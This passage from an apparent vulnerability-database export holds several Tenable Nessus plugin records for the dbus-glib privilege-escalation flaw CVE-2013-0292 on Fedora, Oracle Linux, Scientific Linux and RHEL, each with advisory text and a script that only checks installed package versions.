audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"dbus-glib-0.100-3.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus-glib\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:53", "description": "This update fixes :\n\n - Bug #911714 - CVE-2013-0292 dbus-glib: Local privilege\n escalation due improper filtering of message sender when\n NameOwnerChanged signal received [fedora-all]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-07-12T00:00:00", "title": "Fedora 19 : dbus-glib-0.100-5.fc19 (2013-12199)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:dbus-glib"], "id": "FEDORA_2013-12199.NASL", "href": "https://www.tenable.com/plugins/nessus/67341", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-12199.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67341);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-0292\");\n script_bugtraq_id(57985);\n script_xref(name:\"FEDORA\", value:\"2013-12199\");\n\n script_name(english:\"Fedora 19 : dbus-glib-0.100-5.fc19 (2013-12199)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes :\n\n - Bug #911714 - CVE-2013-0292 dbus-glib: Local privilege\n escalation due improper filtering of message sender when\n NameOwnerChanged signal received [fedora-all]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=911714\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110908.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?143132de\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dbus-glib package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dbus-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"dbus-glib-0.100-5.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus-glib\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:48", "description": "From Red Hat Security Advisory 2013:0568 :\n\nUpdated dbus-glib packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\ndbus-glib is an add-on library to integrate the standard D-Bus library\nwith the GLib main loop and threading model.\n\nA flaw was found in the way dbus-glib filtered the message sender\n(message source subject) when the 'NameOwnerChanged' signal was\nreceived. This could trick a system service using dbus-glib (such as\nfprintd) into believing a signal was sent from a privileged process,\nwhen it was not. A local attacker could use this flaw to escalate\ntheir privileges. (CVE-2013-0292)\n\nAll dbus-glib users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. All running\napplications linked against dbus-glib, such as fprintd and\nNetworkManager, must be restarted for this update to take effect.", "edition": 22, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 / 6 : dbus-glib (ELSA-2013-0568)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:dbus-glib", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:dbus-glib-devel"], "id": "ORACLELINUX_ELSA-2013-0568.NASL", "href": "https://www.tenable.com/plugins/nessus/68765", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0568 and \n# Oracle Linux Security Advisory ELSA-2013-0568 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68765);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0292\");\n script_bugtraq_id(57985);\n script_xref(name:\"RHSA\", value:\"2013:0568\");\n\n script_name(english:\"Oracle Linux 5 / 6 : dbus-glib (ELSA-2013-0568)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0568 :\n\nUpdated dbus-glib packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\ndbus-glib is an add-on library to integrate the standard D-Bus library\nwith the GLib main loop and threading model.\n\nA flaw was found in the way dbus-glib filtered the message sender\n(message source subject) when the 'NameOwnerChanged' signal was\nreceived. This could trick a system service using dbus-glib (such as\nfprintd) into believing a signal was sent from a privileged process,\nwhen it was not. A local attacker could use this flaw to escalate\ntheir privileges. (CVE-2013-0292)\n\nAll dbus-glib users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. All running\napplications linked against dbus-glib, such as fprintd and\nNetworkManager, must be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003292.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003299.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dbus-glib packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dbus-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dbus-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"dbus-glib-0.73-11.el5_9\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"dbus-glib-devel-0.73-11.el5_9\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"dbus-glib-0.86-6.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"dbus-glib-devel-0.86-6.el6_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus-glib / dbus-glib-devel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:47:27", "description": "A flaw was found in the way dbus-glib filtered the message sender\n(message source subject) when the 'NameOwnerChanged' signal was\nreceived. This could trick a system service using dbus-glib (such as\nfprintd) into believing a signal was sent from a privileged process,\nwhen it was not. A local attacker could use this flaw to escalate\ntheir privileges. (CVE-2013-0292)\n\nAll running applications linked against dbus-glib, such as fprintd and\nNetworkManager, must be restarted for this update to take effect.", "edition": 15, "published": "2013-03-01T00:00:00", "title": "Scientific Linux Security Update : dbus-glib on SL5.x, SL6.x i386/x86_64 (20130226)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "modified": "2013-03-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:dbus-glib-debuginfo", "p-cpe:/a:fermilab:scientific_linux:dbus-glib-devel", "p-cpe:/a:fermilab:scientific_linux:dbus-glib", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20130226_DBUS_GLIB_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/64962", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64962);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0292\");\n\n script_name(english:\"Scientific Linux Security Update : dbus-glib on SL5.x, SL6.x i386/x86_64 (20130226)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way dbus-glib filtered the message sender\n(message source subject) when the 'NameOwnerChanged' signal was\nreceived. This could trick a system service using dbus-glib (such as\nfprintd) into believing a signal was sent from a privileged process,\nwhen it was not. A local attacker could use this flaw to escalate\ntheir privileges. (CVE-2013-0292)\n\nAll running applications linked against dbus-glib, such as fprintd and\nNetworkManager, must be restarted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1302&L=scientific-linux-errata&T=0&P=5781\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27c84ea0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected dbus-glib, dbus-glib-debuginfo and / or\ndbus-glib-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:dbus-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:dbus-glib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:dbus-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"dbus-glib-0.73-11.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"dbus-glib-debuginfo-0.73-11.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"dbus-glib-devel-0.73-11.el5_9\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"dbus-glib-0.86-6.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"dbus-glib-debuginfo-0.86-6.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"dbus-glib-devel-0.86-6.el6_4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus-glib / dbus-glib-debuginfo / dbus-glib-devel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:12:05", "description": "Updated dbus-glib packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\ndbus-glib is an add-on library to integrate the standard D-Bus library\nwith the GLib main loop and threading model.\n\nA flaw was found in the way dbus-glib filtered the message sender\n(message source subject) when the 'NameOwnerChanged' signal was\nreceived. This could trick a system service using dbus-glib (such as\nfprintd) into believing a signal was sent from a privileged process,\nwhen it was not. A local attacker could use this flaw to escalate\ntheir privileges. (CVE-2013-0292)\n\nAll dbus-glib users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. All running\napplications linked against dbus-glib, such as fprintd and\nNetworkManager, must be restarted for this update to take effect.", "edition": 25, "published": "2013-02-27T00:00:00", "title": "RHEL 5 / 6 : dbus-glib (RHSA-2013:0568)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "modified": "2013-02-27T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:dbus-glib", "cpe:/o:redhat:enterprise_linux:5.9", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:dbus-glib-devel", "p-cpe:/a:redhat:enterprise_linux:dbus-glib-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2013-0568.NASL", "href": "https://www.tenable.com/plugins/nessus/64904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0568. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64904);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0292\");\n script_bugtraq_id(57985);\n script_xref(name:\"RHSA\", value:\"2013:0568\");\n\n script_name(english:\"RHEL 5 / 6 : dbus-glib (RHSA-2013:0568)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dbus-glib packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\ndbus-glib is an add-on library to integrate the standard D-Bus library\nwith the GLib main loop and threading model.\n\nA flaw was found in the way dbus-glib filtered the message sender\n(message source subject) when the 'NameOwnerChanged' signal was\nreceived. This could trick a system service using dbus-glib (such as\nfprintd) into believing a signal was sent from a privileged process,\nwhen it was not. A local attacker could use this flaw to escalate\ntheir privileges. (CVE-2013-0292)\n\nAll dbus-glib users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. All running\napplications linked against dbus-glib, such as fprintd and\nNetworkManager, must be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0292\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected dbus-glib, dbus-glib-debuginfo and / or\ndbus-glib-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus-glib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0568\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"dbus-glib-0.73-11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"dbus-glib-debuginfo-0.73-11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"dbus-glib-devel-0.73-11.el5_9\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"dbus-glib-0.86-6.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"dbus-glib-debuginfo-0.86-6.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"dbus-glib-devel-0.86-6.el6_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus-glib / dbus-glib-debuginfo / dbus-glib-devel\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:28:33", "description": "Updated dbus-glib packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\ndbus-glib is an add-on library to integrate the standard D-Bus library\nwith the GLib main loop and threading model.\n\nA flaw was found in the way dbus-glib filtered the message sender\n(message source subject) when the 'NameOwnerChanged' signal was\nreceived. This could trick a system service using dbus-glib (such as\nfprintd) into believing a signal was sent from a privileged process,\nwhen it was not. A local attacker could use this flaw to escalate\ntheir privileges. (CVE-2013-0292)\n\nAll dbus-glib users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. All running\napplications linked against dbus-glib, such as fprintd and\nNetworkManager, must be restarted for this update to take effect.", "edition": 25, "published": "2013-03-01T00:00:00", "title": "CentOS 5 / 6 : dbus-glib (CESA-2013:0568)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "modified": 